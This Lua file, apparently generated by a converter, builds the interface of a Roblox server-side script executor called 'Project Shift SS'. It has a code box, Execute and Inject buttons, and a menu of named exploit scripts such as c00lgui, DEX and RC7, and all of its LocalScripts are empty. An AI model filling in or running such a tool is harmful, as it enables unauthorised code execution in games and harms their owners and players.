--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 103 | Scripts: 25 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.ScreenGui.Scanner
G2L["2"] = Instance.new("LocalScript", G2L["1"]);
G2L["2"]["Name"] = [[Scanner]];


-- StarterGui.ScreenGui.Notification
G2L["3"] = Instance.new("LocalScript", G2L["1"]);
G2L["3"]["Name"] = [[Notification]];


-- StarterGui.ScreenGui.Frame
G2L["4"] = Instance.new("Frame", G2L["1"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(150, 150, 150);
G2L["4"]["Size"] = UDim2.new(0, 385, 0, 275);
G2L["4"]["Position"] = UDim2.new(0.19514, 0, 0.14394, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Dragify
G2L["5"] = Instance.new("LocalScript", G2L["4"]);
G2L["5"]["Name"] = [[Dragify]];


-- StarterGui.ScreenGui.Frame.UIStroke
G2L["6"] = Instance.new("UIStroke", G2L["4"]);
G2L["6"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["6"]["LineJoinMode"] = Enum.LineJoinMode.Miter;
G2L["6"]["Thickness"] = 3;
G2L["6"]["Color"] = Color3.fromRGB(53, 53, 53);


-- StarterGui.ScreenGui.Frame.top
G2L["7"] = Instance.new("Frame", G2L["4"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(105, 105, 105);
G2L["7"]["Size"] = UDim2.new(0, 385, 0, 24);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Name"] = [[top]];


-- StarterGui.ScreenGui.Frame.top.UIStroke
G2L["8"] = Instance.new("UIStroke", G2L["7"]);



-- StarterGui.ScreenGui.Frame.top.TextLabel
G2L["9"] = Instance.new("TextLabel", G2L["7"]);
G2L["9"]["TextWrapped"] = true;
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["TextSize"] = 14;
G2L["9"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["9"]["TextScaled"] = true;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["9"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9"]["BackgroundTransparency"] = 1;
G2L["9"]["Size"] = UDim2.new(0, 385, 0, 24);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Text"] = [[Project Shift SS]];


-- StarterGui.ScreenGui.Frame.top.TextLabel.UIStroke
G2L["a"] = Instance.new("UIStroke", G2L["9"]);



-- StarterGui.ScreenGui.Frame.Text
G2L["b"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["b"]["Active"] = true;
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["b"]["CanvasPosition"] = Vector2.new(0, 1);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(113, 113, 113);
G2L["b"]["Name"] = [[Text]];
G2L["b"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["b"]["Size"] = UDim2.new(0, 289, 0, 215);
G2L["b"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Position"] = UDim2.new(0, 0, 0.091, 0);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["ScrollBarThickness"] = 2;


-- StarterGui.ScreenGui.Frame.Text.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.ScreenGui.Frame.Text.UIStroke
G2L["d"] = Instance.new("UIStroke", G2L["b"]);



-- StarterGui.ScreenGui.Frame.Text.TextLabel
G2L["e"] = Instance.new("TextLabel", G2L["b"]);
G2L["e"]["LineHeight"] = 1.01;
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["TextColor3"] = Color3.fromRGB(191, 191, 191);
G2L["e"]["BackgroundTransparency"] = 1;
G2L["e"]["Size"] = UDim2.new(0, 28, 0, 216);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[1]];
G2L["e"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["e"]["Position"] = UDim2.new(0, 0, -0.00477, 0);


-- StarterGui.ScreenGui.Frame.Text.TextLabel.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["e"]);



-- StarterGui.ScreenGui.Frame.Text.TextBox
G2L["10"] = Instance.new("TextBox", G2L["b"]);
G2L["10"]["CursorPosition"] = -1;
G2L["10"]["LineHeight"] = 1.01;
G2L["10"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["10"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["TextSize"] = 14;
G2L["10"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(94, 94, 94);
G2L["10"]["RichText"] = true;
G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["10"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["10"]["MultiLine"] = true;
G2L["10"]["ClearTextOnFocus"] = false;
G2L["10"]["PlaceholderText"] = [[-- welcome to project shift SS]];
G2L["10"]["Size"] = UDim2.new(0, 261, 0, 216);
G2L["10"]["Position"] = UDim2.new(0.09689, 0, -0.00477, 0);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.Text.TextBox.UIStroke
G2L["11"] = Instance.new("UIStroke", G2L["10"]);
G2L["11"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Text.TextBox.UIStroke
G2L["12"] = Instance.new("UIStroke", G2L["10"]);



-- StarterGui.ScreenGui.Frame.Text.TextBox.LocalScript
G2L["13"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.Frame.Text.TextBox.Completor
G2L["14"] = Instance.new("LocalScript", G2L["10"]);
G2L["14"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.Text.TextBox.LocalScript
G2L["15"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.Frame.EssentialBTNS
G2L["16"] = Instance.new("Frame", G2L["4"]);
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["16"]["Position"] = UDim2.new(0.75065, 0, 0, 0);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Name"] = [[EssentialBTNS]];
G2L["16"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.Execute
G2L["17"] = Instance.new("TextButton", G2L["4"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["BackgroundTransparency"] = 1;
G2L["17"]["Size"] = UDim2.new(0, 68, 0, 34);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Execute]];
G2L["17"]["Name"] = [[Execute]];
G2L["17"]["Position"] = UDim2.new(0, 0, 0.87282, 0);


-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["18"] = Instance.new("UIStroke", G2L["17"]);



-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["19"] = Instance.new("UIStroke", G2L["17"]);
G2L["19"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Clear
G2L["1a"] = Instance.new("TextButton", G2L["4"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["BackgroundTransparency"] = 1;
G2L["1a"]["Size"] = UDim2.new(0, 76, 0, 34);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Clear]];
G2L["1a"]["Name"] = [[Clear]];
G2L["1a"]["Position"] = UDim2.new(0.17662, 0, 0.87282, 0);


-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["1b"] = Instance.new("UIStroke", G2L["1a"]);



-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["1c"] = Instance.new("UIStroke", G2L["1a"]);
G2L["1c"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Inject
G2L["1d"] = Instance.new("TextButton", G2L["4"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["BackgroundTransparency"] = 1;
G2L["1d"]["Size"] = UDim2.new(0, 67, 0, 34);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[Inject]];
G2L["1d"]["Name"] = [[Inject]];
G2L["1d"]["Position"] = UDim2.new(0.57662, 0, 0.87282, 0);


-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["1e"] = Instance.new("UIStroke", G2L["1d"]);



-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["1f"] = Instance.new("UIStroke", G2L["1d"]);
G2L["1f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["20"] = Instance.new("LocalScript", G2L["1d"]);



-- StarterGui.ScreenGui.Frame.R6
G2L["21"] = Instance.new("TextButton", G2L["4"]);
G2L["21"]["TextWrapped"] = true;
G2L["21"]["RichText"] = true;
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 14;
G2L["21"]["TextScaled"] = true;
G2L["21"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["BackgroundTransparency"] = 1;
G2L["21"]["Size"] = UDim2.new(0, 49, 0, 24);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[R6]];
G2L["21"]["Name"] = [[R6]];
G2L["21"]["Position"] = UDim2.new(0.87273, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.R6.UIStroke
G2L["22"] = Instance.new("UIStroke", G2L["21"]);



-- StarterGui.ScreenGui.Frame.R6.UIStroke
G2L["23"] = Instance.new("UIStroke", G2L["21"]);
G2L["23"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame
G2L["24"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["24"]["Active"] = true;
G2L["24"]["BorderSizePixel"] = 0;
G2L["24"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(76, 76, 76);
G2L["24"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["24"]["Size"] = UDim2.new(0, 96, 0, 250);
G2L["24"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["Position"] = UDim2.new(0.75065, 0, 0.09091, 0);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["ScrollBarThickness"] = 0;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.UIStroke
G2L["25"] = Instance.new("UIStroke", G2L["24"]);
G2L["25"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.UIListLayout
G2L["26"] = Instance.new("UIListLayout", G2L["24"]);
G2L["26"]["Padding"] = UDim.new(0, 1);
G2L["26"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["27"] = Instance.new("TextButton", G2L["24"]);
G2L["27"]["TextWrapped"] = true;
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["TextSize"] = 14;
G2L["27"]["TextScaled"] = true;
G2L["27"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["27"]["BackgroundTransparency"] = 1;
G2L["27"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Text"] = [[c00lgui]];
G2L["27"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["28"] = Instance.new("LocalScript", G2L["27"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["29"] = Instance.new("UIStroke", G2L["27"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["2a"] = Instance.new("UIStroke", G2L["27"]);
G2L["2a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["2b"] = Instance.new("TextButton", G2L["24"]);
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["BackgroundTransparency"] = 1;
G2L["2b"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[DEX SS]];
G2L["2b"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["2c"] = Instance.new("LocalScript", G2L["2b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["2d"] = Instance.new("UIStroke", G2L["2b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["2e"] = Instance.new("UIStroke", G2L["2b"]);
G2L["2e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["2f"] = Instance.new("TextButton", G2L["24"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["BackgroundTransparency"] = 1;
G2L["2f"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[HD Admin]];
G2L["2f"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["31"] = Instance.new("UIStroke", G2L["2f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["32"] = Instance.new("UIStroke", G2L["2f"]);
G2L["32"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["33"] = Instance.new("TextButton", G2L["24"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 14;
G2L["33"]["TextScaled"] = true;
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["33"]["BackgroundTransparency"] = 1;
G2L["33"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[k00pgui]];
G2L["33"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["34"] = Instance.new("LocalScript", G2L["33"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["35"] = Instance.new("UIStroke", G2L["33"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["36"] = Instance.new("UIStroke", G2L["33"]);
G2L["36"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["37"] = Instance.new("TextButton", G2L["24"]);
G2L["37"]["TextWrapped"] = true;
G2L["37"]["BorderSizePixel"] = 0;
G2L["37"]["TextSize"] = 14;
G2L["37"]["TextScaled"] = true;
G2L["37"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["37"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["37"]["BackgroundTransparency"] = 1;
G2L["37"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Text"] = [[happyhub]];
G2L["37"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["38"] = Instance.new("LocalScript", G2L["37"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["39"] = Instance.new("UIStroke", G2L["37"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["3a"] = Instance.new("UIStroke", G2L["37"]);
G2L["3a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["3b"] = Instance.new("TextButton", G2L["24"]);
G2L["3b"]["TextWrapped"] = true;
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["TextSize"] = 14;
G2L["3b"]["TextScaled"] = true;
G2L["3b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3b"]["BackgroundTransparency"] = 1;
G2L["3b"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3b"]["Text"] = [[RC7]];
G2L["3b"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["3d"] = Instance.new("UIStroke", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["3e"] = Instance.new("UIStroke", G2L["3b"]);
G2L["3e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["3f"] = Instance.new("TextButton", G2L["24"]);
G2L["3f"]["TextWrapped"] = true;
G2L["3f"]["BorderSizePixel"] = 0;
G2L["3f"]["TextSize"] = 14;
G2L["3f"]["TextScaled"] = true;
G2L["3f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3f"]["BackgroundTransparency"] = 1;
G2L["3f"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Text"] = [[ExSer]];
G2L["3f"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["40"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["41"] = Instance.new("UIStroke", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["42"] = Instance.new("UIStroke", G2L["3f"]);
G2L["42"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["43"] = Instance.new("TextButton", G2L["24"]);
G2L["43"]["TextWrapped"] = true;
G2L["43"]["BorderSizePixel"] = 0;
G2L["43"]["TextSize"] = 14;
G2L["43"]["TextScaled"] = true;
G2L["43"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["43"]["BackgroundTransparency"] = 1;
G2L["43"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["43"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["43"]["Text"] = [[KJ]];
G2L["43"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["44"] = Instance.new("LocalScript", G2L["43"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["45"] = Instance.new("UIStroke", G2L["43"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["46"] = Instance.new("UIStroke", G2L["43"]);
G2L["46"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["47"] = Instance.new("TextButton", G2L["24"]);
G2L["47"]["TextWrapped"] = true;
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["TextSize"] = 14;
G2L["47"]["TextScaled"] = true;
G2L["47"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["47"]["BackgroundTransparency"] = 1;
G2L["47"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Text"] = [[Nuke]];
G2L["47"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["48"] = Instance.new("LocalScript", G2L["47"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["49"] = Instance.new("UIStroke", G2L["47"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["4a"] = Instance.new("UIStroke", G2L["47"]);
G2L["4a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["4b"] = Instance.new("TextButton", G2L["24"]);
G2L["4b"]["TextWrapped"] = true;
G2L["4b"]["BorderSizePixel"] = 0;
G2L["4b"]["TextSize"] = 14;
G2L["4b"]["TextScaled"] = true;
G2L["4b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4b"]["BackgroundTransparency"] = 1;
G2L["4b"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["4b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Text"] = [[Polaria]];
G2L["4b"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["4c"] = Instance.new("LocalScript", G2L["4b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["4d"] = Instance.new("UIStroke", G2L["4b"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["4e"] = Instance.new("UIStroke", G2L["4b"]);
G2L["4e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["4f"] = Instance.new("TextButton", G2L["24"]);
G2L["4f"]["TextWrapped"] = true;
G2L["4f"]["BorderSizePixel"] = 0;
G2L["4f"]["TextSize"] = 14;
G2L["4f"]["TextScaled"] = true;
G2L["4f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4f"]["BackgroundTransparency"] = 1;
G2L["4f"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["Text"] = [[c00lkidd music]];
G2L["4f"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["50"] = Instance.new("LocalScript", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["51"] = Instance.new("UIStroke", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["52"] = Instance.new("UIStroke", G2L["4f"]);
G2L["52"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


